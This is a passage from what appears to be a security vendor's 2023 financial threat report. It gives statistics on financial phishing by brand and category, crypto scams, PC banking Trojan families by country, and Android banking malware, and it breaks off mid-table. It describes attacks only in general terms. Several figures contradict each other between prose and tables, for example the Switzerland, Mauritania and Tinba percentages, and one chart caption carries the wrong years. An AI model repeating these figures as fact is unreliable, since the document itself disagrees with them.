  470. <h2 id="financial-phishing">Financial phishing</h2>
  471. <p>In 2023, online fraudsters continued to lure users to phishing and scam pages that mimicked the websites of popular brands and financial organizations. The attackers employed social engineering techniques to trick victims into sharing their financial data or making a payment on a fake page.</p>
  472. <p>This year, we analyzed phishing detections separately for users of our home and business products. Among phishing and scam pages blocked on the devices of business users, 27.32% were financial phishing pages (pages mimicking online banks, payment systems and online stores). For fake pages blocked on home devices, this number was even higher at 30.68%.</p>
  473. <div class="js-infogram-embed" data-id="_/boYLMQpWpL1GXYlETIxb" data-type="interactive" data-title="01 EN Financial report graphs" style="min-height:;"></div>
  474. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>TOP 10 organizations mimicked by phishing and scam pages that were blocked on business users&#8217; devices, 2023 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06082640/01-en-financial-report-graphs-1.png" target="_blank" rel="noopener">download</a>)</em></p>
  475. <div class="js-infogram-embed" data-id="_/3ZS8RqMMAvJhiI8jSaTS" data-type="interactive" data-title="02 EN Financial report graphs" style="min-height:;"></div>
  476. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>TOP 10 organizations mimicked by phishing and scam pages that were blocked on home users&#8217; devices, 2023 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06082651/02-en-financial-report-graphs-1.png" target="_blank" rel="noopener">download</a>)</em></p>
  477. <p>Overall, among the three major financial phishing categories, online store users (41.65%) were targeted the most, followed by banks (38.47%) and payment systems (19.88%).</p>
  478. <div class="js-infogram-embed" data-id="_/G18VozQq8HHirkKRgi8i" data-type="interactive" data-title="03 EN Financial report graphs" style="min-height:;"></div>
  479. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Distribution of financial phishing pages by category, 2023 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06082700/03-en-financial-report-graphs-1.png" target="_blank" rel="noopener">download</a>)</em></p>
  480. <h3 id="online-shopping-scams">Online shopping scams</h3>
  481. <p>Online stores were the most targeted category, comprising more than 40% (41.65%) of all financial phishing pages. Fraudsters impersonated popular online store websites, such as Amazon, eBay and Shopify, as well as brand websites and popular streaming services, such as Spotify and Netflix.</p>
  482. <div class="js-infogram-embed" data-id="_/BxtUdnoTTUPLTrkvt9aq" data-type="interactive" data-title="04 EN Financial report graphs" style="min-height:;"></div>
  483. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>TOP 10 online shopping brands mimicked by phishing and scam pages, 2023 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03155936/04-en-financial-report-graphs.png" target="_blank" rel="noopener">download</a>)</em></p>
  484. <p>The most frequently impersonated e-commerce site was Amazon, which was mimicked in more than one third (34%) of all online store phishing attempts. Apple came in second with 18.66% of fraudulent pages, followed by Netflix, with 14.71%.</p>
  485. <div id="attachment_112529" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154626/Financial_report_2023_01.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112529" class="size-large wp-image-112529" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154626/Financial_report_2023_01-1024x1017.png" alt="Sample of a phishing site that impersonates Amazon" width="1024" height="1017" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154626/Financial_report_2023_01-1024x1017.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154626/Financial_report_2023_01-300x298.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154626/Financial_report_2023_01-150x150.png 150w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154626/Financial_report_2023_01-768x763.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154626/Financial_report_2023_01-352x350.png 352w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154626/Financial_report_2023_01-740x735.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154626/Financial_report_2023_01-282x280.png 282w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154626/Financial_report_2023_01-800x794.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154626/Financial_report_2023_01-50x50.png 50w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154626/Financial_report_2023_01.png 1423w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112529" class="wp-caption-text">Sample of a phishing site that impersonates Amazon</p></div>
  486. <p>The tenth most-copied site was the Latin American online market MercadoLibre, which was mimicked by 1.77% of phishing pages. Fake sites also frequently targeted Louis Vuitton (5.52%), Shopify (4.73%), Alibaba Group (3.17%), Spotify (3.14%), eBay (3.12%) and Luxottica (2.94%) users.</p>
  487. <div id="attachment_112530" style="width: 658px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154705/Financial_report_2023_02.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112530" class="size-large wp-image-112530" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154705/Financial_report_2023_02-648x1024.png" alt="Phishing pages impersonating AliExpress, Spotify and Louis Vuitton websites" width="648" height="1024" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154705/Financial_report_2023_02-648x1024.png 648w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154705/Financial_report_2023_02-190x300.png 190w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154705/Financial_report_2023_02-768x1213.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154705/Financial_report_2023_02-973x1536.png 973w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154705/Financial_report_2023_02-1297x2048.png 1297w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154705/Financial_report_2023_02-222x350.png 222w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154705/Financial_report_2023_02-633x1000.png 633w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154705/Financial_report_2023_02-177x280.png 177w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154705/Financial_report_2023_02-570x900.png 570w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154705/Financial_report_2023_02.png 1568w" sizes="(max-width: 648px) 100vw, 648px" /></a><p id="caption-attachment-112530" class="wp-caption-text">Phishing pages impersonating AliExpress, Spotify and Louis Vuitton websites</p></div>
  488. <p>One of the most common scam types targeting online shoppers consists of cybercriminals offering heavy discounts (which, of course, expire soon), special offers, early access to goods or entertainment, and other &#8220;bargains&#8221;. Both home users and businesses were targeted. For instance, in the screenshot below, a fake page purports to offer a bus at an attractive price. If the user attempts to buy the vehicle, they are prompted to log in with their eBay account, whose credentials are then stolen.</p>
  489. <div id="attachment_112531" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154759/Financial_report_2023_03.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112531" class="size-large wp-image-112531" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154759/Financial_report_2023_03-1024x505.png" alt="Fake page offering a bus at a relatively low price" width="1024" height="505" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154759/Financial_report_2023_03-1024x505.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154759/Financial_report_2023_03-300x148.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154759/Financial_report_2023_03-768x378.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154759/Financial_report_2023_03-1536x757.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154759/Financial_report_2023_03-710x350.png 710w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154759/Financial_report_2023_03-740x365.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154759/Financial_report_2023_03-568x280.png 568w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154759/Financial_report_2023_03-800x394.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154759/Financial_report_2023_03.png 1810w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112531" class="wp-caption-text">Fake page offering a bus at a relatively low price</p></div>
  490. <p>Fraudsters use similar scams on social networks. For example, in the screenshot below, a fake Instagram store is offering Louis Vuitton products.</p>
  491. <div id="attachment_112532" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154831/Financial_report_2023_04.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112532" class="size-large wp-image-112532" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154831/Financial_report_2023_04-1024x760.png" alt="Fake Louis Vuitton store on Instagram" width="1024" height="760" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154831/Financial_report_2023_04-1024x760.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154831/Financial_report_2023_04-300x223.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154831/Financial_report_2023_04-768x570.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154831/Financial_report_2023_04-471x350.png 471w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154831/Financial_report_2023_04-740x549.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154831/Financial_report_2023_04-377x280.png 377w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154831/Financial_report_2023_04-800x594.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154831/Financial_report_2023_04.png 1064w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112532" class="wp-caption-text">Fake Louis Vuitton store on Instagram</p></div>
  492. <p>As new, more secure authentication technologies appear, scammers find ways to evade these, too. The phishing page in the screenshot below, mimicking the Shopify sign-in form, implements a scenario for when the victim uses a <a href="https://help.shopify.com/en/manual/your-account/logging-in/passkeys" target="_blank" rel="noopener">passkey</a> as the authentication method. Passkeys can only be used on the websites and apps they were created for. To authorize <a href="https://developers.google.com/identity/passkeys" target="_blank" rel="noopener">passkey authentication</a>, the user has to unlock the device the passkey was issued for. That means passkeys are of no use to phishers. To trick users into choosing to authenticate with a manually entered one-time code instead, the fake page displays an error message.</p>
  493. <div id="attachment_112533" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154902/Financial_report_2023_05.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112533" class="size-large wp-image-112533" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154902/Financial_report_2023_05-1024x554.png" alt="Fake Shopify page trying to bypass passkey authentication" width="1024" height="554" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154902/Financial_report_2023_05-1024x554.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154902/Financial_report_2023_05-300x162.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154902/Financial_report_2023_05-768x415.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154902/Financial_report_2023_05-1536x831.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154902/Financial_report_2023_05-647x350.png 647w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154902/Financial_report_2023_05-740x400.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154902/Financial_report_2023_05-518x280.png 518w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154902/Financial_report_2023_05-800x433.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154902/Financial_report_2023_05.png 1605w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112533" class="wp-caption-text">Fake Shopify page trying to bypass passkey authentication</p></div>
  494. <h3 id="payment-system-phishing">Payment system phishing</h3>
  495. <p>Payment systems were mimicked in 19.88% of financial phishing attacks detected and blocked by Kaspersky products in 2023.</p>
  496. <div class="js-infogram-embed" data-id="_/QDfxNNGdun3BJEfYfUly" data-type="interactive" data-title="05 EN Financial report graphs" style="min-height:;"></div>
  497. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>TOP 5 payment systems mimicked by phishing and scam pages (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03160007/05-en-financial-report-graphs.png" target="_blank" rel="noopener">download</a>)</em></p>
  498. <p>Among these, PayPal (54.73%) was the one that received the most attention, with more than half of attacks using its image.</p>
  499. <div id="attachment_112534" style="width: 1012px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154937/Financial_report_2023_06.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112534" class="size-large wp-image-112534" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154937/Financial_report_2023_06-1002x1024.png" alt="Fake page targeting PayPal users" width="1002" height="1024" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154937/Financial_report_2023_06-1002x1024.png 1002w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154937/Financial_report_2023_06-294x300.png 294w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154937/Financial_report_2023_06-768x785.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154937/Financial_report_2023_06-343x350.png 343w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154937/Financial_report_2023_06-740x756.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154937/Financial_report_2023_06-274x280.png 274w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154937/Financial_report_2023_06-800x817.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154937/Financial_report_2023_06-50x50.png 50w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154937/Financial_report_2023_06.png 1294w" sizes="(max-width: 1002px) 100vw, 1002px" /></a><p id="caption-attachment-112534" class="wp-caption-text">Fake page targeting PayPal users</p></div>
500. <p>Other frequently mimicked payment systems included MasterCard (16.58%), Visa (8.43%), Interac (4.05%) and PayPay (2.96%). Notably, Visa and MasterCard are typically imitated on fake payment pages linked to a variety of phishing and scam sites rather than on standalone pages.</p>
  501. <h3 id="cryptocurrency-scams">Cryptocurrency scams</h3>
502. <p>In 2023, the number of phishing and scam attacks relating to cryptocurrencies continued to grow. Kaspersky antiphishing technologies prevented 5,838,499 attempts to follow a cryptocurrency-themed phishing link, 16% more than in 2022. This may be because the Bitcoin price, after hitting rock bottom in 2022, started to climb again in 2023. With the price of the number-one cryptocurrency setting new records at the beginning of 2024, this trend can be expected to continue.</p>
  503. <p>We have seen a number of different cryptocurrency-related schemes throughout the year. Scammers impersonated well-known cryptocurrency exchanges and offered coins in the name of major companies. Among the most notable schemes was a <a href="https://securelist.com/hot-and-cold-cryptowallet-phishing/110136/" target="_blank" rel="noopener">phishing campaign</a> that targeted hardware crypto cold wallets. This type of wallet, normally disconnected from the internet, is considered quite safe. However, under the guise of a crypto giveaway, the attackers tricked users into connecting their hardware wallets to a fake website.</p>
  504. <p>We have also seen crypto wallet phishing using well-known non-cryptocurrency brands as a lure. For example, a phishing website bearing the Apple logo and photos of Apple products invited users to get cryptocurrency called &#8220;AppleCoin&#8221;. Interestingly, a coin under that name does exist, but it has nothing to do with Apple Inc.</p>
  505. <div id="attachment_112535" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03155022/Financial_report_2023_07.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112535" class="size-large wp-image-112535" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03155022/Financial_report_2023_07-1024x391.png" alt="Phishing website touting AppleCoin in the name of Apple Inc" width="1024" height="391" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03155022/Financial_report_2023_07-1024x391.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03155022/Financial_report_2023_07-300x114.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03155022/Financial_report_2023_07-768x293.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03155022/Financial_report_2023_07-1536x586.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03155022/Financial_report_2023_07-2048x781.png 2048w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03155022/Financial_report_2023_07-918x350.png 918w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03155022/Financial_report_2023_07-740x282.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03155022/Financial_report_2023_07-734x280.png 734w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03155022/Financial_report_2023_07-800x305.png 800w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112535" class="wp-caption-text">Phishing website touting AppleCoin in the name of Apple Inc</p></div>
  506. <p>If the user believes that Apple has at last issued its own cryptocurrency and enters their wallet credentials, the scammers grab their funds.</p>
  507. <h2 id="pc-malware">PC malware</h2>
508. <p>In 2023, the decline in the number of users affected by financial PC malware continued. Our data showed a decrease from 350,808 in 2022 to 312,453 in 2023, an 11% drop. This trend has persisted for the past several years, and there are several reasons for it. First, users increasingly prefer mobile banking and sign in to their online bank accounts on PCs less frequently than on smartphones. Second, although users may still store their banking credentials in browsers on their desktop computers, most of the notorious PC banking malware families have been repurposed to deliver other malware, such as ransomware, to infected systems. These banking Trojans are now often used in more sophisticated targeted attacks, which usually means they infect fewer users.</p>
  509. <div class="js-infogram-embed" data-id="_/2ZwjMzgN2sPpUkWc7Tkv" data-type="interactive" data-title="06 EN Financial report graphs" style="min-height:;"></div>
  510. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Changes in the number of unique users attacked by banking malware in 2023 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03160037/06-en-financial-report-graphs.png" target="_blank" rel="noopener">download</a>)</em></p>
511. <p>As can be seen in the graph above, banking malware attacks spiked in March. This coincided with a fourfold increase in <a href="https://securelist.com/emotet-darkgate-lokibot-crimeware-report/110286/#emotet" target="_blank" rel="noopener">Emotet</a>&#8217;s activity, which was its last large-scale campaign observed in 2023.</p>
  512. <h3 id="key-banking-malware-actors">Key banking malware actors</h3>
  513. <p>The notable strains of banking Trojans in 2023 included Ramnit (35.1%), Zbot (22.5%) and Emotet (16.2%), which remained the top three financial malware families for the PC. The percentages of all three grew compared to 2022, together comprising nearly three-quarters of all financial malware attacks on desktop computers.</p>
  514. <table width="100%">
  515. <tbody>
  516. <tr>
  517. <td width="25%"><strong>Name</strong></td>
  518. <td width="60%"><strong>Verdict</strong></td>
  519. <td width="15%"><strong>%*</strong></td>
  520. </tr>
  521. <tr>
  522. <td>Ramnit/Nimnul</td>
  523. <td>Trojan-Banker.Win32.Ramnit</td>
  524. <td>35.1</td>
  525. </tr>
  526. <tr>
  527. <td>Zbot/Zeus</td>
  528. <td>Trojan-Banker.Win32.Zbot</td>
  529. <td>22.5</td>
  530. </tr>
  531. <tr>
  532. <td>Emotet</td>
  533. <td>Trojan-Banker.Win32.Emotet</td>
  534. <td>16.2</td>
  535. </tr>
  536. <tr>
  537. <td>CliptoShuffler</td>
  538. <td>Trojan-Banker.Win32.CliptoShuffler</td>
  539. <td>6.9</td>
  540. </tr>
  541. <tr>
  542. <td>Danabot</td>
  543. <td>Trojan-Banker.Win32.Danabot</td>
  544. <td>2.2</td>
  545. </tr>
  546. <tr>
  547. <td>Tinba</td>
  548. <td>Trojan-Banker.Win32.Tinba</td>
  549. <td>2.1</td>
  550. </tr>
  551. <tr>
  552. <td>SpyEyes</td>
  553. <td>Trojan-Spy.Win32.SpyEye</td>
  554. <td>1.9</td>
  555. </tr>
  556. <tr>
  557. <td>Qbot/Qakbot</td>
  558. <td>Trojan-Banker.Win32.Qbot</td>
  559. <td>1.8</td>
  560. </tr>
  561. <tr>
  562. <td>BitStealer</td>
  563. <td>Trojan-Banker.Win32.BitStealer</td>
  564. <td>1.3</td>
  565. </tr>
  566. <tr>
  567. <td>IcedID</td>
  568. <td>Trojan-Banker.Win32.IcedID</td>
  569. <td>1.2</td>
  570. </tr>
  571. </tbody>
  572. </table>
  573. <p><em>* Unique users who encountered this malware family as a percentage of all users attacked by financial malware</em></p>
  574. <p>These three Trojans have a range of capabilities apart from stealing banking credentials. They can download additional modules and third-party malware, collect various types of data, such as passwords stored in browsers, and perform other malicious activities.</p>
575. <p>Fourth and fifth were CliptoShuffler (6.9%) and Danabot (2.2%), both regulars in the rankings, and sixth was Tinba (2.2%), also known as &#8220;Tiny Banker Trojan&#8221;. Although we have not seen this family among the most active banking Trojans in previous years, it dates back to 2012, and its source code has been leaked. It is written in assembler and takes its name from its remarkably small size.</p>
576. <p>Other active banking malware families included SpyEyes (1.9%), <a href="https://securelist.com/qbot-banker-business-correspondence/109535/" target="_blank" rel="noopener">QakBot</a> (1.8%), BitStealer (1.3%) and IcedID (1.2%).</p>
  577. <h3 id="brazilian-malware">Brazilian malware</h3>
578. <p>While the overall number of desktop financial malware attacks has steadily declined, we have observed a <a href="https://securelist.com/kaspersky-security-bulletin-crimeware-financial-threats-2024/111093/#resurgence-of-brazilian-banking-trojans" target="_blank" rel="noopener">trend</a> of Brazilian families attempting to fill the void. At the beginning of 2023, we shared insights into new functionality added to <a href="https://securelist.com/prilex-modification-now-targeting-contactless-credit-card-transactions/108569/" target="_blank" rel="noopener">Prilex</a>, a type of malware known to target ATMs and PoS (point of sale) terminals. Kaspersky experts found that the new modification was specifically designed to defeat contactless payments. When someone tries to pay with a contactless card, the infected PoS terminal displays an error message prompting the buyer to insert the card instead, which lets the attackers capture sensitive payment details. Cybercriminals can then run unauthorized transactions and potentially steal large sums of money from unsuspecting victims.</p>
579. <p>Another notable malware strain is <a href="https://securelist.com/crimeware-report-gopix-lumar-rhysida/110871/#gopix" target="_blank" rel="noopener">GoPIX</a>, which targets the Brazilian instant payment system <a href="https://en.wikipedia.org/wiki/Pix_(payment_system)" target="_blank" rel="noopener">PIX</a>. It spreads by impersonating the WhatsApp web app. Once installed, it starts monitoring the clipboard. If it detects PIX transaction data, it replaces that data with attacker-controlled data, so the user unknowingly transfers money to cybercriminals. It handles Bitcoin and Ethereum transactions in the same manner.</p>
580. <p>Recently, our Global Research and Analysis Team (GReAT) discovered <a href="https://securelist.com/coyote-multi-stage-banking-trojan/111846/" target="_blank" rel="noopener">Coyote</a>, a new banking Trojan of Brazilian origin. Targeting more than 60 banking institutions, primarily in Brazil, this malware uses a sophisticated infection chain built on several relatively new technologies. Spreading via the Squirrel installer, it relies on a NodeJS environment and the Nim programming language to complete the infection. Coyote is capable of keylogging, taking screenshots, and setting up fake pages to steal user credentials.</p>
  581. <h3 id="geography-of-pc-banking-malware-attacks">Geography of PC banking malware attacks</h3>
  582. <p>To highlight the countries where financial malware was most prevalent in 2023, we calculated the share of users who encountered banking Trojans in the total number attacked by any type of malware in the country. The following statistics indicate where users are most likely to encounter financial malware.</p>
583. <p>The highest share of banking Trojans was registered in Afghanistan (6%), Turkmenistan (5.2%) and Tajikistan (3.7%). Switzerland (3.2%) and Mauritania (3%) were also among the countries worst affected by this type of threat.</p>
  584. <p>TOP 20 countries by share of attacked users</p>
  585. <table width="100%">
  586. <tbody>
  587. <tr>
  588. <td width="70%"><strong>Country*</strong></td>
  589. <td width="30%"><strong>%**</strong></td>
  590. </tr>
  591. <tr>
  592. <td>Afghanistan</td>
  593. <td>6</td>
  594. </tr>
  595. <tr>
  596. <td>Turkmenistan</td>
  597. <td>5.2</td>
  598. </tr>
  599. <tr>
  600. <td>Tajikistan</td>
  601. <td>3.7</td>
  602. </tr>
  603. <tr>
  604. <td>China</td>
  605. <td>3.2</td>
  606. </tr>
  607. <tr>
  608. <td>Switzerland</td>
  609. <td>3</td>
  610. </tr>
  611. <tr>
  612. <td>Mauritania</td>
  613. <td>2.4</td>
  614. </tr>
  615. <tr>
  616. <td>Sudan</td>
  617. <td>2.3</td>
  618. </tr>
  619. <tr>
  620. <td>Egypt</td>
  621. <td>2.2</td>
  622. </tr>
  623. <tr>
  624. <td>Syria</td>
  625. <td>2.1</td>
  626. </tr>
  627. <tr>
  628. <td>Yemen</td>
  629. <td>2</td>
  630. </tr>
  631. <tr>
  632. <td>Paraguay</td>
  633. <td>2</td>
  634. </tr>
  635. <tr>
  636. <td>Algeria</td>
  637. <td>1.9</td>
  638. </tr>
  639. <tr>
  640. <td>Venezuela</td>
  641. <td>1.9</td>
  642. </tr>
  643. <tr>
  644. <td>Uzbekistan</td>
  645. <td>1.7</td>
  646. </tr>
  647. <tr>
  648. <td>Libya</td>
  649. <td>1.7</td>
  650. </tr>
  651. <tr>
  652. <td>Zimbabwe</td>
  653. <td>1.7</td>
  654. </tr>
  655. <tr>
  656. <td>Spain</td>
  657. <td>1.6</td>
  658. </tr>
  659. <tr>
  660. <td>Pakistan</td>
  661. <td>1.6</td>
  662. </tr>
  663. <tr>
  664. <td>Iraq</td>
  665. <td>1.6</td>
  666. </tr>
  667. <tr>
  668. <td>Thailand</td>
  669. <td>1.5</td>
  670. </tr>
  671. </tbody>
  672. </table>
  673. <p><em>* Excluded are countries and territories with relatively few (under 10,000) Kaspersky users.</em><br />
  674. <em>** Unique users whose computers were targeted by financial malware as a percentage of all Kaspersky users who encountered malware in the country.</em></p>
  675. <h3 id="types-of-attacked-users">Types of attacked users</h3>
  676. <p>Consumers (61.2%) were the main target of financial malware attacks in 2023, with their share unchanged from 2022.</p>
  677. <div class="js-infogram-embed" data-id="_/I7U0avE5vXj2GJDgfZvo" data-type="interactive" data-title="07 EN Financial report graphs" style="min-height:;"></div>
  678. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Financial malware attack distribution by type (corporate vs consumer), 2021–2022 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03160107/07-en-financial-report-graphs.png" target="_blank" rel="noopener">download</a>)</em></p>
  679. <h2 id="mobile-malware">Mobile Malware</h2>
  680. <p>In 2023, 32% more Android users encountered mobile banking malware than in the previous year: 75,521 attacks compared to 57,219 in 2022. Moreover, we observed notable growth in the number of affected users in the last quarter of the year, which may be due to a new financial malware family called Mamont that targets mainly users in the CIS.</p>
  681. <div class="js-infogram-embed" data-id="_/2FFnOfY8x3bKX5CRjcW1" data-type="interactive" data-title="08 EN Financial report graphs" style="min-height:;"></div>
  682. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Number of Android users attacked by banking malware by month, 2022–2023 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03160135/08-en-financial-report-graphs.png" target="_blank" rel="noopener">download</a>)</em></p>
  683. <p>The most active Trojan banker was Bian.h (22.22%), followed by Agent.eq (20.95%), whose share grew by 17.50 pp compared to 2022. Third was Faketoken.pac, which affected 5.33% of all users who encountered mobile financial threats in 2023.</p>
  684. <table width="100%">
  685. <tbody>
  686. <tr>
  687. <td width="40%"><strong>Verdict</strong></td>
  688. <td width="15%"><strong>%*, 2022</strong></td>
  689. <td width="15%"><strong>%*, 2023</strong></td>
  690. <td width="15%"><strong>Difference in pp</strong></td>
  691. <td width="15%"><strong>Change in ranking</strong></td>
  692. </tr>
  693. <tr>
  694. <td>Trojan-Banker.AndroidOS.Bian.h</td>
  695. <td>23.78</td>
  696. <td>22.22</td>
  697. <td>-1.56</td>
  698. <td>0</td>
  699. </tr>
  700. <tr>
  701. <td>Trojan-Banker.AndroidOS.Agent.eq</td>
  702. <td>3.46</td>
  703. <td>20.95</td>
  704. <td>+17.50</td>
  705. <td>+6</td>
  706. </tr>
  707. <tr>
  708. <td>Trojan-Banker.AndroidOS.Faketoken.pac</td>
  709. <td>6.42</td>
  710. <td>5.33</td>
  711. <td>-1.09</td>
  712. <td>+1</td>
  713. </tr>
  714. <tr>
  715. <td>Trojan-Banker.AndroidOS.Agent.cf</td>
  716. <td>1.16</td>
  717. <td>4.84</td>
  718. <td>+3.68</td>
  719. <td>+13</td>
  720. </tr>
  721. <tr>
  722. <td>Trojan-Banker.AndroidOS.Agent.ma</td>
  723. <td>0.00</td>
  724. <td>3.74</td>
  725. <td>+3.74</td>
  726. <td></td>
  727. </tr>
  728. <tr>
  729. <td>Trojan-Banker.AndroidOS.Agent.la</td>
  730. <td>0.04</td>
  731. <td>3.20</td>
  732. <td>+3.16</td>
  733. <td></td>
  734. </tr>
  735. <tr>
